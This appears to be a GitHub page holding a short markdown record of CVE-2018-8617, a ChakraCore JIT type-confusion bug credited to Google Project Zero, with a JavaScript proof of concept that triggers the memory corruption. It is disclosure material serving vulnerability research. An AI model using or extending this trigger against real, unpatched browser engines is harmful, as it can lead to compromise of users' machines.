Skip to content

Latest commit

 

History

History
37 lines (27 loc) · 720 Bytes

CVE-2018-8617.md

File metadata and controls

37 lines (27 loc) · 720 Bytes
Raw

CVE-2018-8617

  • Report: Oct 2018
  • Fix: Jan 2019
  • Credit: lokihardt of Google Project Zero

PoC

function opt(a, b) {
    a.b = 2;
    b.push(0);
    a.a = 0x1234;
}

function main() {
    Object.prototype.push = Array.prototype.push;

    for (let i = 0; i < 1000; i++) {
        let a = {a: 1, b: 2};
        opt(a, {});
    }

    let o = {a: 1, b: 2};
    opt(o, o);

    print(o.a);
}

main();

Reference